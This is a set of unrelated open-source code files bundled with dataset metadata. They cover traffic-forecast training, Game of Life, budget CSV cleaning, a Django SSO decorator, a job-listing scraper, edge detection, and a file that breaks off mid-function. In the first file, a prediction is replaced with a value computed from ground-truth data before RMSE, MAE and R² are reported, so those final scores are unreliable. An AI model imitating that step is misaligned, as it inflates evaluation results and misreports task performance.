shuffle=False)\n\n input_shape = X.shape\n meta_shape = X_meta.shape\n cross_shape = X_cross.shape\n\n\n model = Mvstgn(input_shape, meta_shape,\n cross_shape, nb_flows=opt.nb_flow,\n fusion=opt.fusion).to(device) \n print(print_para(model), flush=True)\n\n optimizer = optim.Adam(model.parameters(), opt.lr)\n scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,\n milestones=[0.5 * opt.epoch_size,\n 0.75 * opt.epoch_size, 0.9 * opt.epoch_size],\n gamma=0.1)\n\n if not os.path.exists(opt.save_dir):\n os.makedirs(opt.save_dir)\n if not os.path.isdir(opt.save_dir):\n raise Exception('%s is not a dir' % opt.save_dir)\n\n if opt.loss == 'l1':\n criterion = nn.L1Loss().cuda()\n elif opt.loss == 'l2':\n criterion = nn.MSELoss().cuda()\n\n print('Training ...')\n log(opt.model_filename + '.log', '[training]')\n if opt.train:\n train()\n\n pred, truth = predict('test')\n\n prediction_ct += pred\n truth_ct += truth\n\n if opt.traffic != 'internet':\n prediction_ct[-24] = ((truth_ct[-25] + truth_ct[-26] + truth_ct[-27]) / 3.0) * 2.5\n\n print('Final RMSE:{:0.5f}'.format(\n metrics.mean_squared_error(prediction_ct.ravel(), truth_ct.ravel()) ** 0.5))\n print('Final MAE:{:0.5f}'.format(\n metrics.mean_absolute_error(prediction_ct.ravel(), truth_ct.ravel())))\n\n Y = truth_ct.ravel()\n Y_hat = prediction_ct.ravel()\n\n print('Final R^2 Score: {:.4f}'.format(metrics.r2_score(Y, Y_hat)))\n print('Final Variance Score: {:.4f}'.format(metrics.explained_variance_score(Y, Y_hat)))\n","repo_name":"glab2019/MVSTGN","sub_path":"scripts/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10578,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"43724031341","text":"import argparse\nimport Modeling_lib\nimport sys\nimport Parse_input\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('-i', '--input', nargs='?', const='sys.stdin', default='sys.stdin',\n help='Use -i/--input + filename to read from file(default=sys.stdout).')\n\nparser.add_argument('-o', '--output', nargs='?', const='sys.stdout', default='sys.stdout',\n help='Use -o/--output + filename to read from file(default=sys.stdout).')\n\nres = parser.parse_args()\n\nif parser.parse_args().input != 'sys.stdin':\n with open(parser.parse_args().input, 'r') as file:\n lines = file.read().split('\\n')\n n, h, w, ocean = Parse_input.get_inf(lines)\nelse:\n lines = sys.stdin.read().split('\\n')\n n, h, w, ocean = Parse_input.get_inf(lines)\n\nfirst_gen = Modeling_lib.Generation(h, w, False)\n\nfirst_gen.set_ocean(ocean)\n\nlife = Modeling_lib.Life(first_gen)\n\nif parser.parse_args().output != 'sys.stdout':\n with open(parser.parse_args().output, 'w') as file:\n file.write(str(life.get_generation(n)))\nelse:\n sys.stdout.write(str(life.get_generation(n)))\n","repo_name":"rvg77/game-of-life","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27161537067","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[4]:\n\n\nimport pandas as pd\nimport os\n\ndef clean_data(file):\n '''This function reads the csv file, performs data pre-processing w.r.t to rows, columns and returns a clean data set '''\n df = pd.read_csv(file, header=None)\n df = df.drop([0, 1, 3])\n\n df.iloc[0, :] = df.iloc[0, :].str.replace(\"\\n\", \" \")\n df.columns = df.iloc[0]\n df = df.drop(df.index[0])\n df = df.reset_index(drop=True)\n\n 
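The `clean_data` routine above reads the export with `header=None`, promotes the first surviving row to column names, and then (next line) forward-fills the merged `DmdCd` cells that arrive as NaN. A minimal sketch of those two steps on a toy frame:

```python
import pandas as pd

# Toy frame mimicking a csv read with header=None: row 0 holds the real column names.
raw = pd.DataFrame([["DmdCd", "HOA"],
                    ["01-Health", "2210-01"],
                    [None, "2210-02"]])

raw.columns = raw.iloc[0]          # promote the first row to headers
df = raw.drop(raw.index[0]).reset_index(drop=True)

# Merged cells come through as NaN; forward-fill repeats the last seen value.
df["DmdCd"] = df["DmdCd"].ffill()  # .fillna(method='ffill') is the older spelling
print(df)
```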
df['DmdCd'].fillna(method='ffill', inplace=True)\n df = df[df['HOA'] != 'Total']\n\n df['DmdCd'] = df['DmdCd'].str.replace(\"\\n\", \" \")\n df['HOA'] = df['HOA'].str.replace(\"\\n\", \" \")\n\n return df\n\ndef split_columns_and_rename(df):\n '''This function splits the desired columns (in this case 'DmdCd', HOA) w.r.t '-' delimiter,\n renames the splitted columns and returns the re-orderd dataframe'''\n\n df[['DemandCode', 'Demand']] = df['DmdCd'].str.split(\n '-', n=1, expand=True)\n df = df.drop(columns='DmdCd')\n\n cols1 = list(df.columns)\n df = df[cols1[-2:]+cols1[0:7]]\n\n split_columns = df[\"HOA\"].str.split(\"-\", expand=True)\n df = pd.concat([df, split_columns], axis=1)\n df = df.rename(columns={0: 'MajorHead',\n 1: 'SubMajorHead',\n 2: 'MinorHead',\n 3: 'SubMinorHead',\n 4: 'DetailHead',\n 5: 'SubDetailHead',\n 6: 'BudgetHead',\n 7: 'PlanNonPlan',\n 8: 'VotedCharged',\n 9: 'StatementofExpenditure'})\n\n df = df.drop([10, 11, 12], axis=1)\n df = df.drop(columns=\"HOA\")\n\n cols2 = list(df.columns)\n df = df[cols2[0:2] + cols2[-10:] + cols2[2:8]]\n\n return df\n\ndef write_to_csv(df, output_file):\n '''This function writes the processed data set to a new output file'''\n\n df.to_csv(output_file, index=False)\n\ndef runner():\n '''This function get the inputs from the previous functions and returns the processed datafarme'''\n\n input_file = os.path.join(os.path.dirname('C:/Users/acess/Desktop/materials/dags/'), \"himkosh_data.csv\")\n output_file = os.path.join(os.path.dirname('C:/Users/acess/Desktop/materials/dags/'), \"HP_OLTIS_Sanctioned_Budget.csv\")\n \n budget_data = clean_data(input_file)\n budget_data = split_columns_and_rename(budget_data)\n \n write_to_csv(budget_data, output_file)\n df = pd.read_csv(output_file)\n \n return (df)\n \nif __name__ == \"__main__\":\n runner()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Akash-94/Assignment","sub_path":"processing_data.py","file_name":"processing_data.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5286494912","text":"from Node import Node\nfrom collections import deque\n\n\ndef breathFirstValues(root):\n if not root:\n return ([])\n stack = deque()\n stack.append(root)\n result = list()\n while stack:\n current = stack.popleft()\n result.append(current.data)\n if current.left:\n stack.append(current.left)\n if current.right:\n stack.append(current.right)\n return(result)\n\n\na = Node('a')\nb = Node('b')\nc = Node('c')\nd = Node('d')\ne = Node('e')\nf = Node('f')\n\na.left = b\na.right = c\nb.left = d\nb.right = e\nc.right = f\n\n\nprint(breathFirstValues(a))\nprint(breathFirstValues(None))\n","repo_name":"irgot/FBHC","sub_path":"exercicios/btree bfv.py","file_name":"btree bfv.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9049487399","text":"#!/usr/bin/env python\nimport vtk\nfrom vtk.test import Testing\nfrom vtk.util.misc import vtkGetDataRoot\nVTK_DATA_ROOT = vtkGetDataRoot()\n\n# Create the standard renderer, render window\n# and interactor\nren1 = vtk.vtkRenderer()\nrenWin = vtk.vtkRenderWindow()\nrenWin.AddRenderer(ren1)\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\niren.SetDesiredUpdateRate(3)\n# Create a small mesh. 
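In the `breathFirstValues` helper above ("breath" is a typo for "breadth"), the variable named `stack` is actually consumed with `popleft()`, so it behaves as a FIFO queue, which is exactly what makes the traversal breadth-first. The same routine with queue naming and a self-contained `Node`:

```python
from collections import deque

class Node:
    def __init__(self, data):
        self.data = data
        self.left = None
        self.right = None

def breadth_first_values(root):
    if not root:
        return []
    queue = deque([root])       # FIFO: popleft() is what makes this breadth-first
    result = []
    while queue:
        current = queue.popleft()
        result.append(current.data)
        if current.left:
            queue.append(current.left)
        if current.right:
            queue.append(current.right)
    return result

a, b, c = Node("a"), Node("b"), Node("c")
a.left, a.right = b, c
print(breadth_first_values(a))  # -> ['a', 'b', 'c']
```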
The coarser and more opaque the mesh, the easier it\n# is to see rendering errors.\ninput = vtk.vtkImageMandelbrotSource()\ninput.SetWholeExtent(0,2,0,2,0,2)\ninput.SetSizeCX(2,2,2,2)\ninput.SetMaximumNumberOfIterations(10)\n# make sure we have only tetrahedra\ntrifilter = vtk.vtkDataSetTriangleFilter()\ntrifilter.SetInputConnection(input.GetOutputPort())\n# Create transfer mapping scalar value to opacity\nopacityTransferFunction = vtk.vtkPiecewiseFunction()\nopacityTransferFunction.AddPoint(0,0.0)\nopacityTransferFunction.AddPoint(10,1.0)\n# Create transfer mapping scalar value to color\ncolorTransferFunction = vtk.vtkColorTransferFunction()\ncolorTransferFunction.AddRGBPoint(0,1.0,0.0,1.0)\ncolorTransferFunction.AddRGBPoint(2,0.0,0.0,1.0)\ncolorTransferFunction.AddRGBPoint(4,0.0,1.0,1.0)\ncolorTransferFunction.AddRGBPoint(6,0.0,1.0,0.0)\ncolorTransferFunction.AddRGBPoint(8,1.0,1.0,0.0)\ncolorTransferFunction.AddRGBPoint(10,1.0,0.0,0.0)\n# The property describes how the data will look\nvolumeProperty = vtk.vtkVolumeProperty()\nvolumeProperty.SetColor(colorTransferFunction)\nvolumeProperty.SetScalarOpacity(opacityTransferFunction)\nvolumeProperty.ShadeOff()\nvolumeProperty.SetInterpolationTypeToLinear()\nvolumeProperty.SetScalarOpacityUnitDistance(0.75)\n# The mapper / ray cast function / ray integrator know how to render the data\nvolumeMapper = vtk.vtkUnstructuredGridVolumeZSweepMapper()\nvolumeMapper.SetInputConnection(trifilter.GetOutputPort())\n#vtkUnstructuredGridLinearRayIntegrator rayIntegrator\n# volumeMapper SetRayIntegrator rayIntegrator\nrayIntegrator = vtk.vtkUnstructuredGridPreIntegration()\nvolumeMapper.SetRayIntegrator(rayIntegrator)\n# The volume holds the mapper and the property and\n# can be used to position/orient the volume\nvolume = vtk.vtkVolume()\nvolume.SetMapper(volumeMapper)\nvolume.SetProperty(volumeProperty)\nren1.AddVolume(volume)\nrenWin.SetSize(300,300)\nren1.ResetCamera()\nren1.GetActiveCamera().Azimuth(20.0)\nren1.GetActiveCamera().Elevation(15.0)\nren1.GetActiveCamera().Zoom(1.5)\nrenWin.Render()\ndef TkCheckAbort (__vtk__temp0=0,__vtk__temp1=0):\n foo = renWin.GetEventPending()\n if (foo != 0):\n renWin.SetAbortRender(1)\n pass\n\nrenWin.AddObserver(\"AbortCheckEvent\",TkCheckAbort)\niren.Initialize()\n# --- end of script --\n","repo_name":"HopeFOAM/HopeFOAM","sub_path":"ThirdParty-0.1/ParaView-5.0.1/VTK/Rendering/Volume/Testing/Python/TestPTZSweep.py","file_name":"TestPTZSweep.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"72"} +{"seq_id":"18963756866","text":"# coding: utf-8\nfrom functools import wraps\n\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom django.http import QueryDict, HttpResponseRedirect, HttpResponseForbidden\n\nfrom .utils import sso_hostname, SSOAPIClient, remove_data_from_url\n\n\ndef sso_required(view_func):\n\n @wraps(view_func)\n def _wrapped_view(request, *args, **kwargs):\n if request.user.is_authenticated:\n check_application_permission = getattr(\n settings, 'SSO_CHECK_APPLICATION_PERMISSION', True)\n application_permission = request.session.get(\n 'SSO_APPLICATION_PERMISSION', True)\n if not check_application_permission or application_permission:\n return view_func(request, *args, **kwargs)\n else:\n forbidden_url = reverse('forbidden_application')\n return HttpResponseRedirect(forbidden_url)\n\n token_dict = SSOAPIClient().retrieve_new_token()\n\n callback = request.build_absolute_uri(\n getattr(settings, 
'SSO_CALLBACK_PATH', None))\n callback_url = remove_data_from_url(callback)\n\n qs = QueryDict(None, mutable=True)\n qs['callback_url'] = callback_url\n qs['token'] = token_dict['token']\n\n redirect_url = '{0}?{1}'.format(\n sso_hostname('/authorize'), qs.urlencode(safe='/')\n )\n\n request.session[\"SSO_TOKEN\"] = token_dict['token']\n request.session[\"SSO_TOKEN_EXPIRATION\"] = token_dict['expires_at'].isoformat()\n\n return HttpResponseRedirect(redirect_url)\n\n return _wrapped_view\n\n\ndef ajax_sso_required(view_func):\n\n @wraps(view_func)\n def _wrapped_view(request, *args, **kwargs):\n if request.user.is_authenticated():\n return view_func(request, *args, **kwargs)\n else:\n return HttpResponseForbidden(\"User must be authenticated to access this resource.\")\n\n return _wrapped_view\n","repo_name":"brmed/innvent-sso-python-client","sub_path":"innvent_sso_client/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15153743001","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom Zhilian.items import ZhilianItem\nimport json\n\n# 抓取智联招聘天津的python招聘信息\nclass ZhilianSpider(scrapy.Spider):\n name = 'zhilian'\n allowed_domains = ['zhaopin.com']\n start_urls = ['http://sou.zhaopin.com/jobs/searchresult.ashx?jl=%E5%A4%A9%E6%B4%A5&kw=python']\n\n def parse(self, response):\n # 获取招聘信息列表节点\n url_list = response.xpath('//*[@id=\"newlist_list_content_table\"]/table')\n for temp in url_list:\n # 创建item对象\n item = ZhilianItem()\n # 发布时间\n item['time'] = temp.xpath('//*[@id=\"newlist_list_content_table\"]/table[3]/tr[1]/td[6]/span/text()').extract_first()\n # xpath里不能有table\n url = temp.xpath('//div[@class=\"newlist_list_content\"]/table[2]/tr[1]/td[1]/div/a/@href').extract_first()\n # 转到详情页\n yield scrapy.Request(url,callback=self.parse_url,meta={\"item_1\":item})\n # 下一页\n next_url = response.xpath('//div[@class=\"pagesDown\"]/ul/li[9]/a/@href').extract_first()\n if next_url is None:\n return 0\n #print(next_url,\"************************\")\n # 翻页\n yield scrapy.Request(next_url,callback=self.parse)\n\n def parse_url(self,response):\n # 获取传递过来的item对象\n item = response.meta['item_1']\n # 招聘名称\n item['name'] = response.xpath('//div[@class=\"fixed-inner-box\"]/div[1]/h1/text()').extract_first()\n # 招聘单位\n item['company'] = response.xpath('//div[@class=\"fixed-inner-box\"]/div[1]/h2/a/text()').extract_first()\n\n # 薪资\n item['pay'] = response.xpath('//ul[@class=\"terminal-ul clearfix\"]/li[1]/strong/text()').extract_first()\n # 工作地点\n item['rddress'] = response.xpath('//ul[@class=\"terminal-ul clearfix\"]/li[2]/strong/a/text()').extract_first()\n # 工作经验\n item['experience'] = response.xpath('//ul[@class=\"terminal-ul clearfix\"]/li[5]/strong/text()').extract_first()\n # 学历要求\n item['degree'] = response.xpath('//ul[@class=\"terminal-ul clearfix\"]/li[6]/strong/text()').extract_first()\n # 招聘人数\n item['number'] = response.xpath('//ul[@class=\"terminal-ul clearfix\"]/li[7]/strong/text()').extract_first()\n # 职位类别\n item['sort'] = response.xpath('//ul[@class=\"terminal-ul clearfix\"]/li[8]/strong/a/text()').extract_first()\n # 职位描述\n item['describe'] = response.xpath('//div[@class=\"tab-inner-cont\"]/p/text()').extract()\n # 公司介绍\n #item['introduce'] = ''.join(response.xpath('//div[@class=\"tab-inner-cont\"]/p[1]/text()').extract_first())\n # 工作地点\n item['work_rdd'] = 
''.join(response.xpath('//div[@class=\"tab-inner-cont\"]/h2/text()').extract_first()).strip()\n\n #print(item['work_rdd'])\n yield item\n\n","repo_name":"fanjp666888/spiders_code","sub_path":"Zhilian/Zhilian/spiders/zhilian.py","file_name":"zhilian.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14991350476","text":"import logging\n\nfrom flask_script import Command, Option\n\nfrom app.models.models import EntityLinking, Article\nfrom app.modules.common.utils import translate_doc\nfrom app.modules.computation.questioning import process_entity_verification, generate_questions\nfrom app.modules.poliflow.fetch import fetch_single_document\n\nlogger = logging.getLogger('quick_verify')\n\n\nclass QuickVerifyCommand(Command):\n \"\"\" Initialize the database.\"\"\"\n option_list = (\n Option('--cookie_id', '-c', dest='cookie_id'),\n )\n\n def run(self, cookie_id):\n url_verify(cookie_id)\n\n\ndef url_verify(cookie_id):\n if cookie_id:\n for article in Article.query.order_by(Article.created_at.desc()).all():\n document = fetch_single_document(article.id)\n simple_doc = translate_doc(document)\n simple_doc['cookie_id'] = cookie_id\n question_api_response = generate_questions(simple_doc, simple_doc['cookie_id'])\n\n if 'error' not in question_api_response:\n location = simple_doc['location']\n party = simple_doc['parties'][0]\n print('https://poliflw.nl/l/{}/{}/{}'.format(location, party, article.id))\n else:\n print('Cookie id not set. Set using --cookie_id or -c')\n\n\ndef quick_verify():\n for article in Article.query.all():\n document = fetch_single_document(article.id)\n simple_doc = translate_doc(document)\n simple_doc['cookie_id'] = 'TERMINAL'\n question_api_response = generate_questions(simple_doc, simple_doc['cookie_id'])\n\n if 'error' in question_api_response:\n print(question_api_response['error'])\n\n if 'error' not in question_api_response and question_api_response['label'] == 'PER':\n print(simple_doc['text_description'] + '\\n')\n\n entity_linking_id = question_api_response['question_linking_id']\n entity_linking = EntityLinking.query.filter(EntityLinking.id == entity_linking_id).first()\n\n entity = entity_linking.entity\n politician = entity_linking.linkable_object\n\n print('Entity : \\t{} from {} - {}'.format(entity.text, simple_doc['location'], simple_doc['parties']))\n print('Politician: \\t{} ({}) {} of {} from {}'.format(politician.title, politician.first_name,\n politician.full_name, politician.party,\n politician.municipality))\n\n response = input(\"Is this correct? [y,n,?,stop]: \")\n response_str = str(response)\n\n apidoc = simple_doc\n\n if response_str == 'y':\n print('You said yes.')\n apidoc['response_id'] = politician.id\n process_entity_verification(entity_linking_id, apidoc)\n elif response_str == 'n':\n print('You said no.')\n apidoc['response_id'] = -1\n process_entity_verification(entity_linking_id, apidoc)\n elif response_str == 'stop':\n print('You want to stop.')\n return\n else:\n print('You probably meant that you do not know. 
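The Zhilian spider above threads its half-built item to the detail-page callback through `Request(meta={'item_1': item})`. Scrapy 1.7 and later also offer `cb_kwargs`, which passes plain data as callback arguments and avoids the `response.meta` lookup. A minimal sketch of that hand-off; the selectors and URL here are placeholders, not the real site:

```python
import scrapy

class JobSpiderSketch(scrapy.Spider):
    """Minimal item hand-off sketch between a list page and its detail pages."""
    name = "job_sketch"
    start_urls = ["https://example.com/jobs"]

    def parse(self, response):
        for row in response.css("table.job-row"):
            item = {"time": row.css("td.time::text").get()}
            url = row.css("a::attr(href)").get()
            # cb_kwargs (Scrapy >= 1.7) replaces meta={'item_1': item} for plain data.
            yield response.follow(url, callback=self.parse_detail,
                                  cb_kwargs={"item": item})

    def parse_detail(self, response, item):
        item["name"] = response.css("h1::text").get()
        yield item
```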
Lets continue.')\n print('\\n\\n')\n print('Thanks!')\n","repo_name":"Joostrothweiler/politags","sub_path":"app/commands/quick_verify.py","file_name":"quick_verify.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"19232490469","text":"'''\nstrip() was used to get rid of \"\\n\"s at the end of each lines\nimplementation without using set() and sort(key = len)\n'''\n\n\n'''\nimport sys\nN = int(sys.stdin.readline())\nwords = [[] for _ in range(0,51)]\nfor _ in range(N):\n\tword = sys.stdin.readline().strip()\n\tif word not in words[len(word)-1]:\n\t words[len(word)-1].append(word)\nfor i in words:\n i.sort()\nfor j in words:\n\tif len(j) != 0:\n\t for k in j:\n\t print(k)\n'''\n'''\n\n\nimport sys\nN = int(sys.stdin.readline())\nwords = [[] for _ in range(0, 51)]\nfor _ in range(N):\n word = sys.stdin.readline().strip()\n if word not in words[len(word)-1]:\n words[len(word)-1].append(word)\nfor i in words:\n i.sort()\n if len(i) != 0:\n for j in i:\n print(j)\n'''\n\nimport sys\nN = int(sys.stdin.readline())\nwords = [sys.stdin.readline().strip() for i in range(N)]\nwords = list(set(words))\nwords.sort(key = lambda x: (len(x), x))\nfor j in words:\n\tprint(j)","repo_name":"hgyoon/BaekjoonOnlineJudge","sub_path":"1181.py","file_name":"1181.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19530558515","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport os\nimport math\nimport time\nfrom skimage import data, filters\n\n\ndef scale(X, x_min, x_max):\n \"\"\"\n Scale a vector or matrix between given min and max value.\n X: array or matrix\n x_min: minimum of X\n x_max: maximum of X\n \"\"\"\n min = X.min()\n max = X.max()\n nom = (X - min) * (x_max - x_min)\n denom = max - min\n return x_min + nom / denom\n\n\ndef get_gradients(img2D):\n \"\"\"\n Compute gradients in X and Y-axis\n img2D: input image as 2-dimension\n \"\"\"\n img2D = cv2.GaussianBlur(img2D, (5, 5), 0)\n gx = cv2.Sobel(img2D, cv2.CV_64F, 1, 0, ksize=3)\n gy = cv2.Sobel(img2D, cv2.CV_64F, 0, 1, ksize=3)\n return gx, gy\n\n\ndef get_bgrimg_gradients(bgrimg):\n \"\"\"\n Compute edges of a color image.\n args:\n bgrimg: color image\n returns:\n B_gx: derivative in X-axis for B channel\n B_gy: derivative in Y-axis for B channel\n G_gx: derivative in X-axis for G channel\n G_gy: derivative in Y-axis for G channel\n R_gx: derivative in X-axis for R channel\n R_gy: derivative in Y-axis for R channel\n \"\"\"\n bx, by = get_gradients(bgrimg[:, :, 0])\n gx, gy = get_gradients(bgrimg[:, :, 1])\n rx, ry = get_gradients(bgrimg[:, :, 2])\n return bx, by, gx, gy, rx, ry\n\n\ndef compute_structure_matrix(bx, by, gx, gy, rx, ry):\n \"\"\"\n Compute the Structure(S) matrix components from Jacobian(J)\n r_x r_y\n J = g_x g_y\n b_x b_y\n\n S = a b\n b c\n\n a = r_x^2 + g_x^2 + b_x^2\n b = r_x*r_y + g_x*g_y + b_x*b_y\n c = r_y^2 + g_y^2 + b_y^2\n returns:\n a,b,c element of S\n \"\"\"\n a = np.square(rx) + np.square(gx) + np.square(bx)\n b = rx * ry + gx * gy + bx * by\n c = np.square(ry) + np.square(gy) + np.square(by)\n return a, b, c\n\n\ndef compute_eigen_values(a, b, c):\n \"\"\"\n Compute eigen values from Structure matric component following slide.\n returns:\n lambda1: eigenvalue\n lambda2: eigenvalue, always 0\n \"\"\"\n a_plus_c = a + c\n a_plus_c_sqr = np.square(a_plus_c)\n ac_sub_b_sqr = a * c - 
np.square(b)\n sqrt_a_plus_c_sqr_sub_4ac_sub_b_sqr = np.sqrt(\n a_plus_c_sqr - 4 * ac_sub_b_sqr)\n lambda1 = (a_plus_c + sqrt_a_plus_c_sqr_sub_4ac_sub_b_sqr) / 2\n lambda2 = (a_plus_c - sqrt_a_plus_c_sqr_sub_4ac_sub_b_sqr) / 2\n return lambda1, lambda2\n\n\ndef get_edge_direction(a, b, lambda1):\n \"\"\"\n Returns edge direction by calculating eigenvectors.\n From slide, (a-lambda1) + by = 0\n => y/x = (a-lambda1) / -b\n let, y = a-lambda1\n so, x = -b\n returns:\n X-direction\n Y-direction\n \"\"\"\n # x = - b / (a - lambda1)\n # x[np.isnan(x)] = 0\n # y = np.ones((1200, 1600))\n # y[np.isnan(x)] = 0\n #\n # denom = np.sqrt(np.square(x) + 1)\n # dx = x / denom\n # dy = 1.0 / denom\n # return dx, dy\n return -b, a - lambda1\n\n\ndef quiver_visualization(dx, dy, title):\n \"\"\"\n Plot quiver visualization plot given dx, dy\n \"\"\"\n step = 50\n fig, ax = plt.subplots(figsize=(8, 8))\n dx = dx[::step, ::step]\n dy = dy[::step, ::step]\n ax.quiver(dx, dy)\n ax.set_aspect('equal')\n ax.title.set_text(title)\n\n\ndef quiver_for_color(bx, by, gx, gy, rx, ry):\n \"\"\"\n Calculate gradients of color image given gradients in b, g, r channel in X and Y-axis.\n \"\"\"\n dx = bx + gx + rx\n dy = by + gy + ry\n quiver_visualization(\n dx, dy, title=\"Gradient visualization for color image\")\n\n\ndef quiver_for_gray(img):\n \"\"\"\n Calculate gradients of gray image given gradients in X and Y-axis.\n \"\"\"\n gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n dx, dy = get_gradients(gray_img)\n quiver_visualization(\n dx, dy, title=\"Gradient visualization for grayscale image\")\n\n\ndef non_maximum_suppression(magnitudes, angles):\n \"\"\"\n Does non-maximum suppresion based on gradient magnitudes and orientation\n returns:\n gmax: the activation after non-maximum-suppression\n \"\"\"\n gmax = np.zeros(magnitudes.shape)\n for i in range(gmax.shape[0]):\n for j in range(gmax.shape[1]):\n if angles[i][j] < 0:\n angles[i][j] += 360\n\n if ((j + 1) < gmax.shape[1]) and ((j - 1) >= 0) and ((i + 1) < gmax.shape[0]) and ((i - 1) >= 0):\n # 0 degrees\n if (angles[i][j] >= 337.5 or angles[i][j] < 22.5) or (angles[i][j] >= 157.5 and angles[i][j] < 202.5):\n if magnitudes[i][j] >= magnitudes[i][j + 1] and magnitudes[i][j] >= magnitudes[i][j - 1]:\n gmax[i][j] = magnitudes[i][j]\n # 45 degrees\n if (angles[i][j] >= 22.5 and angles[i][j] < 67.5) or (angles[i][j] >= 202.5 and angles[i][j] < 247.5):\n if magnitudes[i][j] >= magnitudes[i - 1][j + 1] and magnitudes[i][j] >= magnitudes[i + 1][j - 1]:\n gmax[i][j] = magnitudes[i][j]\n # 90 degrees\n if (angles[i][j] >= 67.5 and angles[i][j] < 112.5) or (angles[i][j] >= 247.5 and angles[i][j] < 292.5):\n if magnitudes[i][j] >= magnitudes[i - 1][j] and magnitudes[i][j] >= magnitudes[i + 1][j]:\n gmax[i][j] = magnitudes[i][j]\n # 135 degrees\n if (angles[i][j] >= 112.5 and angles[i][j] < 157.5) or (angles[i][j] >= 292.5 and angles[i][j] < 337.5):\n if magnitudes[i][j] >= magnitudes[i - 1][j - 1] and magnitudes[i][j] >= magnitudes[i + 1][j + 1]:\n gmax[i][j] = magnitudes[i][j]\n return gmax\n\n\ndef plot_hist(hist1, label1=\"label\"):\n \"\"\"\n Plots a histogram. 
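compute_eigen_values above applies the closed form for a symmetric 2x2 structure matrix [[a, b], [b, c]]; a quick numeric check against numpy's general solver, with sample entries chosen arbitrarily:

```python
# Verify the closed-form eigenvalues used in compute_eigen_values against
# np.linalg.eigvals for one arbitrary structure matrix [[a, b], [b, c]].
import numpy as np

a, b, c = 4.0, 1.0, 2.0
disc = np.sqrt((a + c) ** 2 - 4 * (a * c - b ** 2))
closed_form = sorted([(a + c + disc) / 2, (a + c - disc) / 2])
print(np.allclose(closed_form, sorted(np.linalg.eigvals([[a, b], [b, c]]))))  # True
```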
Helper function for analysing.\n \"\"\"\n plt.plot(hist1, label=label1)\n plt.show()\n\n\ndirectory = 'ST2MainHall4/'\n# filename = 'ST2MainHall4001.jpg'\nfilename = 'human3.tif'\nimg = cv2.imread(directory + filename)\ncv2.imshow(\"Original image\", img)\n# Gradient visualization for grayscale image\nquiver_for_gray(img)\n\n# gradients for color image for every channel\nbx, by, gx, gy, rx, ry = get_bgrimg_gradients(img)\n# Gradient visualization for color image\nquiver_for_color(bx, by, gx, gy, rx, ry)\n# compute structure matrix\na, b, c = compute_structure_matrix(bx, by, gx, gy, rx, ry)\n# trace, edge_strengths\nmagnitudes = a + c\n# eigenvalues\nlambda1, lambda2 = compute_eigen_values(\n a, b, c)\n# eigen vectors orientation\ndx, dy = get_edge_direction(a, b, lambda1)\n# magnitude and angles of eigenvectors\nmagnitudes, angles = cv2.cartToPolar(dx, dy, angleInDegrees=True)\n# scalling magnitudes from 0 to 255\nmagnitudes = scale(magnitudes, 0, 255)\n\n# edges after non_maximum_suppression\nedges = non_maximum_suppression(magnitudes, angles)\n# cv2.imshow(\"after non max\", edges)\n# print(edges.min())\n# print(edges.max())\n# hist, bins = np.histogram(edges.ravel(), bins=256)\n# hist[0:127] = 0\n# print(hist)\n# plot_hist(hist)\n\n# appling hysteresis threshold\nlow = 0\nhigh = 1.7\nhighest = (edges > high).astype(int)\nour_edges = filters.apply_hysteresis_threshold(edges, low, high)\nfig, ax = plt.subplots(nrows=1, ncols=1)\nax.imshow(highest + our_edges, cmap='magma')\nplt.tight_layout()\n\nplt.show()\ncv2.waitKey(0)\n","repo_name":"akabiraka/cs682_computer_vision","sub_path":"hw3/extra_credit.py","file_name":"extra_credit.py","file_ext":"py","file_size_in_byte":7341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33735281053","text":"import tensorflow as tf\nif tf.__version__.split(\".\")[0]=='2':\n import tensorflow.compat.v1 as tf\n tf.disable_v2_behavior()\n import tensorflow.compat.v1.logging as logging\nimport numpy as np\nimport joblib\nimport time\nimport json\nimport argparse\nimport os\n\nfrom kgcn.gcn import NumPyArangeEncoder\nfrom kgcn.gcn import get_default_config, load_model_py\nfrom kgcn.data_util import load_and_split_data, load_data\nfrom kgcn.core import CoreModel\nfrom kgcn.feed_index import construct_feed\n\n\ndef print_ckpt(sess, ckpt):\n #checkpoint = tf.train.get_checkpoint_state(args.ckpt)\n print(\"==\", ckpt)\n for var_name, _ in tf.contrib.framework.list_variables(ckpt):\n var = tf.contrib.framework.load_variable(ckpt, var_name)\n print(var_name, var.shape)\n print(\"==\")\n\n\ndef print_variables():\n # print variables\n print('== neural network')\n vars_em = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)\n for v in vars_em:\n print(v.name, v.shape)\n print(\"==\")\n\n\ndef restore_ckpt(sess, ckpt):\n saver = tf.train.Saver()\n 